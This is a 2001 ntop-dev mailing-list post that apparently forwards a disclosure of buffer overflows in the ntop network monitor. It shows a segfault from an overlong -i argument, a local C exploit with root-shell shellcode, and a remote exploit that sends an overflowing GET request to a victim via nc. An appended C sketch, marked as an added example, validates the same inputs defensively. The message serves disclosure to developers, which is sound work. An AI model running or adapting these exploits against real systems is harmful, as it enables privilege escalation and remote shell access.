List: ntop-dev
Subject: [Ntop-dev] ntop hack:((((((((((((((
From: <Alexei.Voronine () dvg ! de>
Date: 2001-10-11 7:31:27
Message-ID: OF5AEE0CD3.C790C17E-ONC1256AE2.00289EAB () i001 ! dvg ! sko ! de
Hi,
Look at that!!!
Source
http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-300/237.html
(in Russian; use the online translator on altavista.com)
tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$
EXPLOIT
========
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define LEN 208
int main (int argc, char **argv)
{
char buf[LEN + 12];
int ret = 0xbffffba0;
int*p;
char code[]=
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
if (argc > 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010x\n", ret);
}
memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0;
execl("./ntop", "ntop", "-i", buf, NULL);
}
REMOTE EXPLOIT
=================
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void usage()
{
printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
printf(" mat@hacksware.com\n");
printf("Usage : ./ntop-w-exp | nc victim port\n");
exit(0);
}
void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;
if(argc >= 2) offset = atoi(argv[1]);
memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
*(long *)&code_buf[i]=(unsigned long)esp-offset;
printf("GET /");
for(i=0;i<CODE_LEN; i++)
{
putchar(code_buf[i]);
}
printf("\r\n\r\n");
}
Kind regards
Alexei Voronine
dvg Hannover
OE352 UNIX Server Control Center (USCC)
e-Mail Alexei.Voronine@dvg.de
Tel: 0511-5102-3703
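
A defensive counterpart to the two inputs exercised in the message above (the -i argument and the GET line in -w mode), as an added example that is not part of the original message and is not ntop's code. The function names, IFACE_MAX and PATH_MAX_LEN are assumptions; the sketch rejects over-long or binary input instead of copying it into a fixed buffer.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define IFACE_MAX 16      /* assumption: Linux IFNAMSIZ, NUL included */
#define PATH_MAX_LEN 128  /* assumption: cap chosen for this sketch */

/* Copy an interface name into a fixed buffer; reject instead of truncating.
 * Returns 0 on success, -1 if empty, too long or not a plausible name. */
int copy_iface_name(char dst[IFACE_MAX], const char *src)
{
    size_t n;
    if (src == NULL) return -1;
    for (n = 0; n < IFACE_MAX && src[n] != '\0'; n++) {
        unsigned char c = (unsigned char)src[n];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-' && c != ':')
            return -1;
    }
    if (n == 0 || n == IFACE_MAX) return -1;   /* no NUL within the limit */
    memcpy(dst, src, n + 1);                   /* n + 1 <= IFACE_MAX */
    return 0;
}

/* Copy the path of a "GET /..." line (len bytes, NUL not required) into dst.
 * Returns -1 on an over-long path or any byte outside printable ASCII. */
int copy_request_path(char *dst, size_t dst_size, const char *line, size_t len)
{
    size_t i, n = 0;
    if (len < 5 || memcmp(line, "GET /", 5) != 0) return -1;
    for (i = 4; i < len; i++) {
        unsigned char c = (unsigned char)line[i];
        if (c == ' ' || c == '\r' || c == '\n') break;
        if (c < 0x21 || c > 0x7e) return -1;
        if (n >= PATH_MAX_LEN || n + 1 >= dst_size) return -1;
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return 0;
}

int main(void)
{
    char name[IFACE_MAX], big[2836];
    memset(big, 'A', sizeof big - 1);   /* constructed: length of the -i test above */
    big[sizeof big - 1] = '\0';
    printf("eth0 -> %d, 2835 x 'A' -> %d\n",
           copy_iface_name(name, "eth0"), copy_iface_name(name, big));
    return 0;
}
```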